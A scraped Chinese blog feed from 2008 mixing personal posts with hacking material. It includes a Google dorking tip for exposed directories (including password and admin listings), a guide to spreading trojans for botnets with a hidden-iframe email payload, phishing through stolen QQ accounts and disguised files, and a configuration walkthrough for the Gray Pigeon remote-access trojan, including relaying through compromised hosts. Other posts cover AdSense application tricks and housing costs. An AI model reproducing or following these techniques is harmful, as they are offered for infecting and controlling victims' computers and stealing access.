再按搜索你就可以突破网站入口下载flash作品
在搜索框上输入："index of /"加上要下载的软件名
再按搜索你就可以突破网站入口下载软件
到这里，大家也许都明白了，其实就是"index of /"这个关键词在起的作用，使用它可以直接进入网站首页下的所有文件和文件夹中，不必在通过HTTP的网页形式了，从而避免了那些网站的限制，作到了突破限制下载

发了这个帖，我又上网遛遛，又发现这篇相关文章，把它贴在这里与大家分享
超级P2P搜索引擎让所有收费网站破产！

搜索Google大家都用过吧？我们正是利用它强劲的搜索功能来突破封锁下载，Google搜索和限制下载有什么关系，没可能实现吧？不要不相信哦，往下看哦！
首先打开Google，在关键词输入框中输入"index of/"inurl:lib(双引号为英文状态下），选择"搜索简体中文网页"选项，回车搜索，得到了一些网页，不要以为这是一些普通的页面，其实它们是一些图书网站的资源列表，点击打开它来看看，怎么样？是不是所有资源一收眼底了？
使用其他关键字可能得到更多的资源：
在搜索框上输入："index of /"cnki
再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口！
在搜索框上输入："index of /" ppt
再按搜索你就可以突破网站入口下载powerpint作品！
在搜索框上输入："index of /"mp3
再按搜索你就可以突破网站入口下载mp3、rm等影视作品！
在搜索框上输入："index of /"swf
再按搜索你就可以突破网站入口下载flash作品！
在搜索框上输入："index of /"加上要下载的软件名
再按搜索你就可以突破网站入口下载软件！
在搜索框上输入："index of /"AVI
再按搜索你就可以突破网站入口下载AVI视频
你会找到什么呢？同理，把AVI换为MPEG看看又会找到什么呢？呵呵！接下来不用我再教了吧？那就试一下你的手气吧！
"index of /" RMVB
"index of /" WMA
"index of /" MTV
"index of /" MPEG
以下是百度搜索排名
1. index of mpeg4
3. index of mp3
4. index of cnki
5. index of rmvb
6. index of rm
7. index of movie
8. index of swf
9. index of jpg
10. index of admin
12. index of pdf
13. index of doc
14. index of wmv
15. index of mdb
16. index of mpg
17. index of mtv
18. index of software
19. index of mov
20. index of asf
23. index of lib
24. index of vod
25. index of rar
27. index of exe
28. index of iso
29. index of video
30. index of book
31. index of soft
32. index of chm
33. index of password
34. index of game
35. index of music
36. index of dvd
37. index of mid
38. index of ebook
40. index of download
到这里，大家也许都明白了，其实就是"index of /"这个关键词在起的作用，使用它可以直接进入网站首页下的所有文件和文件夹中，不必在通过HTTP的网页形式了，从而避免了那些网站的限制，作到了突破限制下载

养鸡专业户

noreply@blogger.com (HuTao) — Tue, 24 Jun 2008 15:30:00 +0000

抓鸡宝典---木马传播狂抓肉鸡终级大餐

一.目前流行木马传播技术.
1.用BT制作木马种子
利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件

然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.

2.利用PP共享自己捆了木马的软件或电影.
方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人

家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla

ye木马制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木

马.这样看电影也会中我们的马.

3.利用QQ邮箱传播木马.
这里主要点HTML格式----在里面写上以下这段代码:

<body > </body>

当人家一打开你发过去的邮件时,就会中我们的木马.

4.QQ群发网页木马。　
首先，你要申请多个QQ号，然后找款QQ消息群发器（黑鹰网站可以找到大量相关QQ群

发信息软件，）再然后要加上非常具有诱惑性的消息（肉鸡的多与少与这个直接相关

，），骗取人家点你的网址。最后，在晚上时可以挂在电脑上群发带有网页木马的信

息。相信只要你的信息够诱惑，肉鸡也是成群的。

5.利用163邮箱传播网页木马。

同样，这里用HTML格式，然后填上以下代码：

</html><iframe src="你的网页木马地址" name="zhu" width="0" height="0"

frameborder="0">

对方只要一打开，就会中我们的网页木马。

这里发送邮件时注意一些技巧，我们要加入一些社会工程会。比如对方是爱好车的，

你就在邮件标题上写上关于车的诱惑性标题。目的只有一个，让他点我们带有网页木

马的邮件。

6.利用邮箱群发我们的网页木马。
这里要用到论坛邮箱提取器，这类工具黑鹰也有下载，大家可以找一下。提取大量

邮箱后，配合FOXMAIL这款软件进行群发传播带有网页木马的邮件。这里也要注意技

巧，比如在一个游戏论坛提取的邮箱，你就可以伪装本论坛发给广大游戏玩家,提供

最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从

而中我们的木马. 这里还可以配合利用HTML格式群发我们的网页木马效果可更佳!

7.捆绑欺骗
这也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮

箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木

马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查

找本人的捆绑系列专辑教程.

8.攻破下载点,捆上木马放入下载点.
当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到

这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点

等待人家上钩吧!该方法抓鸡的速度也非常快.

9.钓鱼式欺骗别人点击你的网页木马地址或木马.

钓鱼式欺骗攻击,也是国内最新发现的一种攻击手法.主要利用社会工程会中的信任

关系骗他点击.具体的利用方法:当盗了人家的QQ号,你可以看看有几个群,然后在群里

放上自己捆绑的木马.接着在群里发几条诱惑性的信息,比如最新申请6位QQ号软件,

由于是在同一个群,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定

很大.若该QQ号主人是群主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己

的网页木马地址,然后说本群刚建的专用网站!由于是群主,他们对他的信任度可想而

知.应该都会点的吧!还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木

马,然后说刚建的个人网站.相信很多好友都会自动点击吧!

10.网站主页挂马
这个应该不用具体介绍吧,教程有N多.入侵到一个网站得到WEBSHELL后,接下来大家

是不是都忙着找首页挂马了.

11.论坛漏洞挂马
这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,

动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关

教程,不是很清楚的可以在黑鹰找到.

12.文件类型伪装
这里主要把一些木马服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑

器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行

文本文件,其实已经中了我们的木马.真是神不知鬼不觉!本人也做过文件类型欺骗的

动画教程.不是很清楚的也可以在黑鹰或动画吧找到本人的相关的教程.当然,还要以

伪装成其它的类型,比如把木马制作成BMP图片.BAT格式等.只要他一运行就会中

我们的马.

14.其它的传播技术:比如制作图片木马,也有专门的图片木马制作工具,RM木马制作

黑鹰也有相关教程,RealOnePlayer木马制作,FLASH木马制作.也有专门的制作工具,

网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可

以在网上找到相关资料,自己尝试制作.

二.新型高级木马传播技术
下面介绍几种比较高级的木马传播技术.由于有一定的技术难度,所以隐蔽性比较强,

传播速度也快,而且也几乎不会被杀毒软件查杀.

1.在WORD文档中加入木马文件
这种方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就

会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使

别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一

步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.

2.黑客工具绑木马
其实这本来算不上高级的方法,但最近发现很多黑客软件发布站,捆了木马的工具躲过

管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客

工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从

而被他们利用.这一招是他们把黑客中的社会工程学利用的"恰到好处"!

3.用Z-file伪装加密木马程序

z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像

文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏

合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往

往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出

它内藏木马.

4.伪装成应用程序扩展组件
此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度

由于涉及到编程,所以我这里只简单介绍原理,以供参考.

采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实

现木马程序的隐藏.

5.通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播.

相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行

分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数

级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作

器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用

QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站

进行分布式DDOS攻击.利用该技术是相当高级的,速度也是最快的.

嘿嘿!觉得还不错的顶下吧!
本文章总节归纳了目前最流行的木马传播技术以及以后木马传播技术的发展趋势,

内容相当本文章总节归纳了目前最流行的木马传播技术以及以后木马传播技术的发展趋势,

内容相当丰富.相信看完本文你一定会成为养鸡专业户.
丰富.相信看完本文你一定会成为养鸡专业户

鸽子配置

noreply@blogger.com (HuTao) — Tue, 24 Jun 2008 08:09:00 +0000

以鸽子分服务端---肉鸡，控制端---我们的电脑，为例。

服务端是以8000端口上线的，所以我们的电脑----控制端要打开8000端口。

    当我们打开控制端时，8000端口也就随之打开，等待肉鸡的连接。

    服务端（肉鸡）并不是看到哪台电脑开放8000端口，就连接哪台电脑的，它只会连接指定ip 的8000端口，而这个ip 就是我们给

服务端事先设好的。所以呢，我们在配置服务端的时候，最重要的地方是"自动上线设置"。

比如，先举个简单直观的例子。寝室有3台电脑，用交换机相连，这就意味着这3台电脑是不能接入互连网的。但彼此间可以通

信。我们分别把3台电脑的ip 设置为192.168.0.1     192.168.0.2       192.168.0.3     。假设我电脑的ip 为其中一台，ip 为第一个。如果

我来配置服务端，打开灰鸽子（黑防版），点击"配置服务程序""     ，"自动上线设置" 处。我们添192.168.0.1。其他的选项不用管。

直接点""生成服务器"" 这样就配置好了。你让另外2台电脑运行，或自己运行，都可以。都会上线。因为服务端很容易就找到了你

的ip 192.168.0.1，并上线。这就好比，你养了只聪明的鸽子，你告诉它你的地址，这样每次它都会飞回来。

再比如，我们设置上线转向域名为http;//qqq.88.cn/ip.txt。其中         qqq.88.cn" target="_blank">http://qqq.88.cn       是我们申请的支持ftp上传的空间。为什么

我要在域名

后面加上ip.txt呢？ip.txt是在ftp空间的一个含有ip 信息的文件。

鸽子要上线，它首先会连接我们这个ftp空间，并读取ip.txt中的ip 信息。比如ip.txt中的信息为218.220.118.34：8000。这个信息告

诉服务端（肉鸡）去连接218.220.118.34这台电脑的8000端口。

总的来说，就是肉鸡连接ftp并读取空间上ip.txt中的ip信息，然后肉鸡才会连接ip文件中指定的ip，也就是我们的电脑，如果我们是外网，鸽子就上线了。

用到的ftp空间，实际上是一个中转站，中转站的作用就是告诉肉鸡所要连接的ip和端口。所以，肉鸡要上线，我们就要把我们电脑的ip信息更新到ftp空间去。

通过这两个例子，细心的朋友不难发现，关键在于""""自动上线设置""""，这个就是一个地址，让肉鸡能找到你家的地址。只要你给

肉鸡明确的地址，它就能找到你。

1：本地电脑为静态ip，则配置服务端上线ip可以直接写上静态ip，无需域名转向。

2：本地电脑为动态ip，，则配置服务端可以用域名转向，也就是上面举的例子。

    一句话概括鸽子上线原理为：你要把你本地电脑的地址给肉鸡，肉鸡就能找到你并和你建立连接上线。

3：如果本地为内网，则要通过端口映射达到肉鸡上线的目的。

下面讲解内网下肉鸡上线的问题。

我们在内网，把ip 更新到ftp 空间后，肉鸡只能找到本地电脑的连接设备如路由器的ip，但路由器没有打开8000端口供鸽子进来，这样鸽子就不能上线。

这里我得解释一个问题，内网环境下，电脑要和外界通信，必须得通过路由器，这就相当于路由器把它之下的电脑与外界隔离。

如果在电脑与路由器之间铺设一条路，通向外面，这样鸽子就能上线。具体来说，就是路由器开放8000端口与你的电脑直接相连，这样，鸽子找到路由器，看到8000端口，就会由8000端口进来连接你的电脑，这样鸽子就找到我们的电脑，鸽子就上线了。

具体设置路由器开放8000端口映射的方法，请参考路由器说明书，在此就不赘诉。

还有一种可能，条件是你有一台静态ip的肉鸡1并自身处于外网。鸽子自带有端口映射工具。

端口映射工具也分服务端和控制端之分，这个工具有什么用呢？当静态ip的肉鸡1运行端口映射工具的服务端后，就会开放一个默

认的9999端口（此端口可自定义），我们用映射工具控制端，选择     "连接" 后，肉鸡1就会和我们在9999端口建立连接。灰鸽子服

务端上线ip 直接添上肉鸡1的ip，因为肉鸡1的ip为固定，所以没有更新ip一说。

这样肉鸡2运行灰鸽子服务端后，会连接肉鸡1的8000端口，但此时肉鸡1并没有开放8000端口。这时我们在本地用端口映射工具控

制端           选择         "映射"     ，这样肉鸡1就会开放8000端口，并把来自8000端口的连接转向我们本地电脑，也就是会把肉鸡2的

连接转到我们本地电脑。这样鸽子就上线了。概括的说，就是，肉鸡2连接肉鸡1的8000端口，而肉鸡1会把来自8000端口的连接转

到我们本地电脑。

站长为买一套房子需要开辟几个站

noreply@blogger.com (HuTao) — Mon, 23 Jun 2008 11:31:00 +0000

买了份报纸，浏览了一下，好奇一下北京的房价。二环内都卖到8000～10000元/平方米。假如要拥有一套小一点的两房一厅，居然也得要100万

　　关于金钱，我没什么概念。好在比较喜欢具象思维，赶紧换算一下，想起来比较容易。

　　假如我是个农民，一个人，有一亩地已经不错了。一年种两次，一次小麦，一次玉米，一年能挣个800块，再加上养一群鸭子，卖点鸭蛋，估计最多也就能挣1000块。想要在上海那郊区买套像样的房子，我得不吃不喝地耕种1000年。到那时候，共产主义该实现了吧?

　　假如我是个工人，没有下岗，一个月拿800块钱，不抽烟，不喝酒，不结婚，不吃饭。渴了喝凉水，饿了吃烂菜叶，冷了拣破麻袋穿，总之，一分钱不花，在房价不上涨的前提前，要买那样的房子，得连续工作100年。估计，没什么工厂要这么老的工人。

　　假如我是个公务员，混得很一般，一个月2500块，也不抽烟，不喝酒，不吃饭，还不贪污，不受贿，不挪用公款，要想买那样的房子(同样，房价不上涨)，我得熬上33年。估计刚买了房子，就得退休了，而且极有可能因为营养不良而迅速逝世。

　　假如我是个撰稿人，而且混得还不错，每两个字一块钱，我也不抽烟，不喝酒，不吃饭，也不泡文学女青年，要想买那样的房子(同样，房价不上涨)，我得连续写2000000字，而且还得保证字字有人要。假如连构思、带写、带修改，每小时可以顺利完成2000字，那么，就得连续写1000个小时，在 WORD文档上连续写2000页。我明白了，为什么写字的人容易夭折?憋的。

　　假如我是妓女，姿色一般，平均每次收获200块，我也不抽烟，不喝酒，不吃饭，不得性病，不养小白脸，要想买那样的房子(同样，房价不上涨)，我得连续接5000次客人。假如每天接客两人(含法定节假日)，那得连续奋战2500天，费时7年左右。

　　假如我是抢劫犯，手段一般，眼神一般，每次出手抢得1000元，我也不抽烟，不喝酒，不吃饭，不找女人，不被抓住，要想买那样的房子(同样，房价不上涨)，得连续作案1000次，假如每星期作案一次，那得连续作案18年。

　　假如我是商人，我连吃带喝，也抽烟，也喝酒，也吃饭，也得性病，也养小蜜，只要我有本事贷到款，在房子刚出来的时候，噼里啪啦的付上头款，和同伙一起哄抬，不出两年，几套房子就都到手了。

　　假如你是站长，一个站一个月收入1000快，你有10个这样的站，那么你一年的收入是10万(算高级站长了),那么需要10年，你才能艰苦奋斗!!!只可惜我现在才有一个这样的站。

　　我说这些，并不想发牢骚。我只想说，土地这东西，都属于国家资源，首要的功用，是为这个国家的老百姓提供服务。在合法的政策下，再加上自己的手段，利用国家资源为自己挣钱，这并没有太大的罪过。只是，凡是必须有个度。任何一个国家，两极分化得厉害，都不是个太好的兆头。当一个城市里的大多数人被挤到城市的边缘时，这便是罪过的一种，和英国的圈地运动并不两样。

　　我们再想一想，两极分化是怎么形成的?看看以上购房的时限，答案就呼之欲出了。一个普通的公民，他辛辛苦苦地工作一辈子，赚得那点可怜的钱，被祖国拿去一部分，被房地产商拿去一部分，最后再被炒房者拿去一部分，这两极要想不分化，也很困难。想想那些在城市里奋斗多年的普通人，几乎大部分人都背上沉重的房贷包袱。这就是大多数人的命运。

　　我并不是非议国家不可以从土地中获取利益。只是，大众之财，取之于民，用之于民。假如你获取了这些收入，却无法保障大多数人住上满意的房子，那么这"取"，也取得不理直气壮。或许，我这点想法有点愤青，只是，前两天看新闻，都说宪法有进步了，要保护公民的私有财产了。我想，这还是有个因果关系 ――前提是，你首先得保障大多数百姓拥有一定数量的财产。假如大伙为了一套破房子都累得死去活来，你还有什么好保护的?世界上，没有绝对公正的法律，物质控制能力决定了其走向，我不能说普通百姓就不收益了，然而，在这个法令下受益最大的，是大多数还是少数人?

　　耕者有其田，居者有其所，这历来都是百姓对于一个国家最起码的要求。不知为何，我突然想起一个例子，记得很不清晰了――似乎是在老俄罗斯，一个穷人没饭吃，偷了一块面包。在当时，这可是大罪。其结局是，他并没有被定罪，原因是，当一个国家无法为其人民提供生存条件，为了生存，他偷窃了，真正有罪的不是他，而是这个国家。

　　来吧!魔鬼! 你的存在将为我的生命乐章增添更多的伏笔和惊奇! 没有你奇迹如何发生! 来吧!挫败! 没有你的磨练，我如何成为耀眼夺目的钻石! 来吧!我的软弱! 如果我不能看见你，我如何变的刚强! 来吧!对手! 没有你的参与，我与谁竞争。

　　为了那点"幸福"，我要坚持不懈的裸露自己的大腿根处，直到光辉灿烂的彼岸!

此文转载于站长站，发于www.txxts.com原文地址如下：

http://www.admin5.com/article/20080623/90359.shtml

父亲节，携父治病，抗癌救命!

noreply@blogger.com (HuTao) — Mon, 16 Jun 2008 11:01:00 +0000

    在这个不平凡的年头，对于我的家庭来说也十分的不平凡，我的父亲得了癌症，从08伊始至尽，已经经历了三个疗程的化疗，状态好转，这期间遇到了无数的好人，经历了一生中只发生一次的无数的事情。
父亲节刚好星期天，一家人放假在家，清晨父亲告诉我说要买个冰箱，先前我不知道父亲为什么会有这样的举动，但是是父亲要求的事情我没有反对，后来才知道从医院带回来的药需要放在冰箱里冷藏，这些细小的环节我没有亲自听医生的嘱托，所以开始不知道；后来想想也是圆了父亲的一个小小的心愿，毕竟在我家人老八代还没有用上冰箱；入夜，看着新买的冰箱，忍不住放了瓶啤酒进去，真是可惜父亲现在不能喝酒，若然我两碰上一杯该是多么惬意的事情；妈妈想放吃剩下的一碗菜，父亲不允许，直到今天里面也没放进去多少东西；放了药、牛奶、苹果，希望这个冰箱能在我们抗癌的道路上帮父亲一把，使生活条件有所提高！
    我希望我的父亲能顺利的接受治疗，直到肿瘤彻底消失，能有机会给操劳一生的爸爸妈妈安享晚年、享受美好的生活的机会；无数个象我的爸爸妈妈辛勤劳作的父辈们，你们自私一点吧！吃饭多吃点，睡觉多睡会，孩子长大了都知道自己照顾自己了，我们可以面对纷繁复杂的世界了！
    父亲节已悄然过去，真心祝愿父亲身体能早日康复，让我在次看看你生龙活虎的姿容！

noreply@blogger.com (HuTao) — Mon, 09 Jun 2008 16:50:00 +0000

关键词选取技巧：3w.seoclub.cn/seo/doc/20080317140731.htm
Google管理员中心：3w.google.com/webmasters/
Google网站管理员支持论坛：groups.google.com/group/google_webmaster_help-zh-CN
雅虎知识堂:ks.cn.yahoo.com/
DVBBS友链地址：3w.dvbbs.net/link/
巡航网地址：3w.xunhang.com/
站内SEO技巧：3w.seoclub.cn/Case/2143.htm

视频站都疯了，我也疯了！

noreply@blogger.com (HuTao) — Fri, 06 Jun 2008 08:59:00 +0000

KU6---PC
6间---dede ？
56--ec ？

视频站都疯了

疯狂的转型

GG--dz

看谁的后台硬

还是dz

我也疯了

DZ+SS+XS+UCH+EC+SV=天衣无缝的结合

LINUX+PHP+MYSQL=爽

JS+DIV+CS=生活的享受

而这些在这很长的一段时间中都学了个差不多

方向在哪里

不能只在模板的美化中找感觉

为了美圆

就让我在疯狂一次吧

为了目标

我还要再疯狂一次

喀吧

noreply@blogger.com (HuTao) — Wed, 04 Jun 2008 08:58:00 +0000

www.txxts.com/hutao/kav.rar

业务

noreply@blogger.com (HuTao) — Tue, 03 Jun 2008 07:27:00 +0000

1 做flash 的
2 做alexa排名的
3 做seo 服务的
4 做建站服务的做模板的
5 做群发邮件，群发手机的。
6 一些团购方面的服务
7 所有的cms
8 有做t恤的信息
9 做站长茶杯等工艺的也可
10 代理国外空间，主机的。

收集下国内外开源的SNS程序

noreply@blogger.com (HuTao) — Mon, 02 Jun 2008 17:23:00 +0000

http://www.barnraiser.org/demos/
http://200.180.240.134/yogurt/newuser.php
http://opensource.ikse.net/
http://www.dotnode.com/
http://demo.phpizabi.net
http://demo.thinksns.com/
http://www.pb-m.com/php/onlinecommunity/
http://demo.socialengine.net/home.php
http://www.boonex.us/

WOWO同UCH同期发布给我的感觉

noreply@blogger.com (HuTao) — Tue, 27 May 2008 06:57:00 +0000

1.欢喜地抛弃了自己用了很多年的原配，期待迎娶一个贤淑美丽多功能的处女，没想到入洞房之后才发现，到手的既不是处女也不是多功能，甚至还赶不上被自己抛弃的原配……
2.几天，忽然发现，那个贤淑美丽多功能的处女，竟然被答应给自己这个处女的人抱在怀里，而且十分委屈又信誓旦旦地对自己说：第一，这个是我儿子的作品，我没有权利让给你；第二，出于共享的人道主义精神，我决定把我们的孩子嫁给你；第三，在等待孩子长大的过程中，不许对我怀里的女人想入非非……因为我已经答应给你我们的孩子了，你不必承受制造孩子付出的体力、培养孩子长大的时间……

地震后遗症

noreply@blogger.com (HuTao) — Tue, 27 May 2008 00:57:00 +0000

1 原来打招呼问："吃了没？去哪儿？"，现在逢人就招呼："今晚上睡哪儿？"2 原来关心别人住哪儿，现在关心别人住几楼； 3 每次余震过后就拿放大镜观察自己的房子有没有裂缝； 4 觉得二楼很高； 5 超级讨厌有抖腿的习惯的人； 6 见不得哪个把手机开成震动； 7 偶然自己抖哈腿都会遭吓倒； 8 房子晃的时候紧张得要死，希望它再也不要晃了。等它不晃了又紧张得要死，不晓得大地是不是在积蓄能量，是不是暴风雨来临前的平静。反正晃或者不晃都紧张得要死； 9 移动用户决定以后不做移动用户，联通用户也决定以后不做联通用户； 10 空闲时候计算从自己楼上的家火速飞奔到空地上到底需要好多秒； 11 背起一个自认为装有重要物品的包包随身携带，并且睡觉都不离身，或者最多不离身一米； 12 不相信自己的感觉，不停向别个求证："刚才是不是晃了一伙哇？" 13 每隔5分钟必定要关注桌子上装着水的杯子； 14 每天同事见面的第一个话题："昨天遭摇醒没？"； 15 对地理知识突然很感兴趣； 16 对求生知识突然很感兴趣； 17 穿得周五正王的切睡觉，心头盘算："鞋子脱不脱勒？" 18 养成了看新闻的的好习惯，而且一看就哭

关于重组

noreply@blogger.com (HuTao) — Mon, 26 May 2008 00:48:00 +0000

强烈呼吁：

取消月基本费
取消来电显示费
取消漫游费
实行无限制免费接听
实行按秒计费

香港3G了，日本3G了，韩国3G了，中国还在2G混，落后就要挨打啊。
现在的无线网卡都慢得像蜗牛。

形成三足鼎立的状况后效果会好点吧！

希望给老百姓带来更大更多的实惠！

今天早上跟女朋友干了一架

noreply@blogger.com (HuTao) — Sat, 24 May 2008 05:15:00 +0000

干了一架无语

太她妈的气愤

noreply@blogger.com (HuTao) — Fri, 23 May 2008 08:13:00 +0000

2008年，google针对大陆地区实行了新的审核政策。针对新审核政策的详细申请办法，中国区申请google adsense帐号变得不是那么容易了。
这里介绍一些注意事项和方法。
对于没有网站的朋友，中文可以去www.skyfa.com或者英文可以去www.hubpages.com，在这些网站上注册的朋友可以同时得到自己的博客主页，用这个主页可以在这些网站上直接申请google adsense帐号。
但是请注意：

1）注册skyfa或者hudpages后请务必不要立即申请google adsense。因为即使立即申请了也不会被通过审批

2）请更新自己的空间内容，包括视频、图片、音乐等，使自己的空间内容较为丰富。没有具体数量的限制，但我们建议总数不应低于20。另外特别提醒大家注意的是，在审核之前尽量避免上传涉及到有关版权问题的作品。如电视剧、电影片段、演唱会、艺人歌曲等，否则将很难通过申请。

3）如果你满足了1和2的条件，即可尝试申请google adsense. 如果您曾经申请过被拒绝也没有关系，只要不是因为申请的姓名和地址有问题，就都可以重新提交。
google adsense加强审核也是为了能使更多优秀的空间可以赚到钱，相信大家在中文skyfa上会赢得越来越多的收入。

4)去GG的最新附属网站：www.flixya.com/注册一个账号，注册完之后他会问你要不要注册1个GG Adsense的帐号，然后你按照要求填写，很快就会批准你了。

5)您可以找到例如歪酷博客的某位陌生博客朋友的博客，只要对方没有添加google广告，而且文章数量比较多，您就用他的博客来申请，只要申请过程中家庭住址、电话号码、邮编、电子邮件等信息是您自己的就可以，申请下来以后，把google广告代码放到您自己的博客或者网站或者论坛，即可！这是google政策允许的，而且丝毫不影响您的收入，因为google广告账户是您自己的，google广告账户不与那个申请的网站有关，只与您的家庭地址、电话号码、邮编、电子邮件等挂钩！同时也是因为google公司允许您的广告放在任何合法的网站或者博客上

补充医疗保险--今天才知道

noreply@blogger.com (HuTao) — Fri, 23 May 2008 03:28:00 +0000

相对于基本医疗保险而言的，包括企业补充医疗保险、商业医疗保险、社会互助和社区医疗保险等多种形式，是基本医疗保险的有力补充，也是多层次医疗保障体系的重要组成部分。

补充医疗保险不是通过国家立法强制实施的，而是由用人单位和个人自愿参加的。是在单位和职工参加统一的基本医疗保险后，由单位或个人根据需求和可能原则，适当增加医疗保险项目，来提高保险保障水平的一种补充性保险。

象真的一样不知道是不是真的

noreply@blogger.com (HuTao) — Wed, 21 May 2008 07:46:00 +0000

贪官、坏官拿命来！
1、温总理到什邡的时候，你们怎么告诉温总理的？
2、灾难之后第几天，你们才到蓥华镇？更不用说红白！
3、救灾物资你们是怎么分发到灾民和部队的手中的？
4、为什么还要检查灾区出来人员的照相设备？
5、当灾民没地方住的时候，为什么ZF官员都在最安全的体育场里的救灾帐篷里？当温总理还在棚布搭建的窝棚里指挥的时候，为什么连完全没受灾的国税局的亲戚们都住进了救灾帐篷？
6、为什么当受灾惨烈的蓥峰公司、金河磷矿报请市政府救援的时候，还要求他们自救？
7、瞒报什邡灾情，延误外部帮助，对你们究竟有什么好处？
8、什邡冤死的老百姓，究竟有多少是因为你们的慌报、瞒报、不作为，而死、痛死在废墟中的！
　　
　　这么多年来，你们把什邡作为你们升迁的镀金地，把什邡作为你们取之不尽，用之不竭的下金蛋的老母鸡，把这只老母鸡作为你们政绩的垫脚石，我们什邡人忍了~但是，现在，这只老母鸡就要死了，你们怎么还如此冷血？
　感谢胡总，终于胡总来了，我们什邡终于成了重灾区！！但是那些本有机会生存的乡亲，却永远没能等到生的希望！
　　何明俊，李成金，用你们的有生之年拷问自己，你们对得起什邡的冤魂们吗？
　　在其他任何灾区，有没有出现两山合二为一的情况？两山之间的巴蜀电站，被永远埋在60米的地下，你们还能告诉温总理，我们什邡受灾不严重？？？？难道你们还要求他们自己打60米的隧道自救？？？
　洛水中学教学楼垮塌，仅仅是一个快班，就是56人全部遇难，难道还不严重？？
　红白、蓥华、洛水三镇我们不用提，建筑不是全毁就是基本全毁，为什么湔底镇就倒了教学楼？反正家长们已经对教学楼的钢筋取证，你们就等着秋后算帐吧！
　在蓥峰公司80吨液氨泄露、宏达公司硫磺车间燃烧的时候，是哪些领导在带头逃命？是哪些人用生命扑灭了毒气？
　温总理都自己打扇，你们在这种时候出巡还要人打伞，你们的官威比总理还大？
　强烈希望到什邡的记者们独立采访！不要宣传部陪同！
　　部队是好样的，把自己的口粮分给灾民，自己到地里挖土豆吃！
　　温总理到什邡的时候，灾民们哭着给温总理说，旁边的父母官们，你们作何感想？？？不要说交通不倡，总理是坐车到的，那是龙居！你们刻意带总理去的并不算严重的龙居！！！
　　胡总昨天到什邡，灾民们齐齐在路边给主席跪下请求支援，你们在旁边作何感想？？
　　还记得你们在雍城中学操场给亲戚搭建偷来的民政救灾帐篷的时候，人们是怎么骂你们的吗？这是救灾帐篷！当时八角的灾区一个生产队都分不到一顶！你们就有那本事给没遭灾的亲戚都搞来！！不管你们的钱从哪里来的，只要是你们自己掏钱买的，就算你们在这里搭个金銮殿，我们都没话说，但是，这救灾帐篷，用钱买的来吗？不要说看不见，上面有刺眼的"民政"两字！！！
　我可以留下我的真实身份：吴斌，1973年10月12日出生，家住什邡市方亭镇中心大街西段67号。跪请多转发，消灭贪官。